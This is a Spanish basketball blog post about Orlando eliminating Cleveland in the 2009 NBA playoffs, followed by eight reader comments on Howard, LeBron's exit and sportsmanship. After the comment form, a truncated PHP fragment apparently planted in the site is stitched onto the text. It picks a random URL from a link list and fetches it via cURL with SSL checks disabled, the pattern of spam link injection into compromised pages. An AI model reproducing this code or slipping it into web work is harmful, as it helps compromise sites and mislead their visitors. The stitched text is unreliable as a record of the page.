Playoffs (30/05/2009): Ciclón Howard

31 de May de 2009 por TheDeerHunter

Habemus finales. Igual que en la otra conferencia apenas hubo partido que la definiera. Orlando no falló y alcanza así la segunda final de su historia, con Supermán Howard en lugar de Supermán O’Neal y habiendo dejado en la cuneta a “The King” James en lugar de a “su majestad” Jordan. Todo un cúmulo de presagios.

No fue la noche del elegido, y sí la de Dwight Howard que, como en los choques decisivos anteriores, disfrutó de la cota de protagonismo que tanto se echa en otros. Y así abusó de Varejao, Ilgauskas y Ben Wallace de tal manera que alguno debe estar pensando incluso en retirarse después del castigo recibido. Una auténtica pesadilla para ellos que, ni a golpes, fueron capaces de frenar. Lanzó 12-16 en tiros libres. Ni kriptonita ni gaitas… La devastación fue absoluta y la superioridad de Orlando en los tableros demoledora. En ningún momento tuvo Cleveland la opción de llevar la iniciativa.

LeBron lo intentó pero sin demasiada convicción. Números humanos que sólo le sirven para llevarse una paliza y es que hubiera hecho falta milagro tras milagro para sacar adelante la eliminatoria. Anoche no lo hubo y se van para casa. A duras penas disputó el partido mientras se vio en condiciones de hacerlo, pero fue sentarse al inicio del 2º cuarto e irse Orlando de 20 puntos. Aún tuvo el mérito de liderar una remontada de 10 puntos en un minuto del tercero, pero todo era una ilusión si la defensa de los Cavs era incapaz de estorbar mínimamente al rival… y eso que se suponía que era una de las principales virtudes de este equipo.

Al final queda la frustración del #23, que dejó plantados a periodistas y compañeros cuando terminó todo. Seguramente necesitaría reflexionar sobre cual será su futuro… o directamente es que está hasta las narices de la presión a la que este año se ha visto sometido. En el peor trago de su carrera a mí me importa un pie que no le de bola a aquellos ávidos de hacer leña del árbol caído. El linchamiento se lo dejamos al corporativismo del “media powa”.

Ahora por fin el contratazo de Rashard Lewis queda plenamente justificado, así como el gran acierto en las  últimas incorporaciones de Alston y Pietrus. Por contra, en Cleveland, no hemos terminado de entender el papel de Joe Smith en esta eliminatoria.

PREMIO

MVP: Dwight Howard mejorando las prestaciones de Shaquille, al menos en cuanto a los tiros libres. Hueso duro que les viene encima a la pareja de 7 pies de LA.

La sorpresa: La labor de Pietrus en ambos lados de la pista. Muchos minutos de trabajo eficaz, cualquiera diría que no ha estado en ninguna quiniela para el 6º hombre. Ahora a parar a Kobe.

La decepción: Hubo un tiempo en que se consideraba a Ilgauskas como el segundo espada de los Cavs. Anoche dos puntos. Un poco corto siquiera para ser siquiera 4º o 5º espada. Al final tenemos que decir que Kantonyo acertó, aunque sólo fuera en cuanto al nivel del juego interior de este equipo.

El mayor esfuerzo en vano: Cómo no LeBron. Aunque en esta ocasión el esfuerzo no ha sido tan inmenso como en otras ocasiones. Que descanse bien este verano.

RAZONES PARA TRASNOCHAR

Ahora ya que cada uno encuentre las suyas… aunque no vendría mal acumular un poco de sueño hasta la finalísima que comenzará el jueves por la noche. No sé si podremos esperar tanto.

Comenta

8 comentarios a esta entrada

  1. kantonyo dice:
    #1

    Gracias por lo que a mi respecta, pero no creo que haya acertado, todo lo contrario, mis pronosticos eran mucho más pesimitas. Sigo pensando que esta plantilla es solo LeBron y poco más, y gracias a su regularidad han podido tener dos cruces muy sencillos, que han deformado un poco la realidad de este equipo. El año que viene serán aún un año más viejo, Ilgauskas, Wallace, Wally …. y no podrán pescar nada bueno en el draft… pero claro teniendo a LeBron seguiran siendo competitivos.

    Apuesto por una victoria clara de Lakers, creo que Denver y Houston son mejores que Orlando (sin Nelson). Aunque en el recuerdo todavia está la final de 2004.

      Citar

  2. Txusma dice:
    #2

    La clave sera Howard y la defensa de Pau y Bynum sobre el. Como comentaba alguien en otro post las todas las miradas estaran sobre el español y ya “no va más”

      Citar

  3. Jabho dice:
    #3

    Creo que el papel de Lewis ha sido fundamental. Ya en la eliminatoria con los Celtics fue un cruz para defenderlo, porque son su altura se va lejos y a los jugadores grandes cuando se los lleva lejos les crea muchos problemas. Pero los Cavs han picado, muy mal Brown, poniendo a James de falso PF para solucionar el desequilibrio porque así howard se hincha, domina el rebote y “abusa” en la zona. Cada vez que ha jugado James de PF, con equipos bajos a a su alrededor (West, Mo y Gibson o Wally) Howard se ha salido.

    Me equivoqué. Esperaba mucho más de los Cavs. Esperaba que supieran defender a los Magic (Boston lo hizo muuuucho mejor) y no lo han hecho. Esta derrota va a hacer mucho daño y les va a costar mucho retener a Lebron dentro de un año…

    En lo que viene la clave será Odom porque es un jugador perfecto para defender a Lewis. Solucionado ese desequilibrio la lucha en la zona será mas equilibrada y si controla la zona, los Lakers tendrán mucho camino hecho. A ver Gasol contra Superman. EN defensa sufrirá pero en ataque tiene mucho recursos para atcarle…

      Citar

  4. Pablorl dice:
    #4

    Me parece que defiendes un poco demasiado a LeBron. Pasar de los periodistas es una cosa (mal pero pasable) pero no ir a felicitar a tus rivales es de muy mal deportista y de muy mal perdedor. Muy poca clase.

      Citar

  5. TheDeerHunter dice:
    #5

    Podemos estar más o menos de acuerdo en eso… pero la trascendencia que se le ha dado a un incidente intrascendente sólo viene por un motivo, y no es precísamente como haya tratado LeBron a sus rivales.

    Además, eso de ser buen deportista o buen perdedor está sobrevalorado y tiene mucho de hipocresía. Me parece lo mismo que lo de tirar el balón fuera cuando hay lesionados. Completamente absurdo… en ningún otro deporte se hace eso y nadie lo ha echado en falta.

      Citar

  6. kantonyo dice:
    #6

    Estoy con Deer, el saber perder es una tonteria como una casa, lo que queremos ver es deportistas sinceros, que se enfaden cuando pierdan, y que no nos enseñen una sonrisa, cuando han perdido una buena oportunidad de ganar un titulo.

    El deporte puro y sincero es espectaculo, ver a Nadal enfadarse con la camara y con los parisinos, o a LeBron el otro día, son aspectos que diferencian a los ganadores que no saben perder, y que ese sentimiento les hace invencibles.

    Tirar el balón fuera cuando se lesiona un jugador (90% de las veces mentira) o esperar a Amstrong cuando pincha, para mi no es señorio, al reves banaliza el deporte.

      Citar

  7. MagicJohnson32 dice:
    #7

    Pues a mí me parece de niñato. No creo que tenga nada que ver el hecho de ser un ganador con la mala educación, poca deportividad y falta de respeto que es largarse como se largó.

      Citar

  8. TheDeerHunter dice:
    #8

    no sé si es de más ganador o menos… pero de vez en cuando se agradecen reacciones que se van un poco del “si bueno no sé… felicito a mis rivales porque soy super-majote.”ç
    Cuanto pasteleo, diosss

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>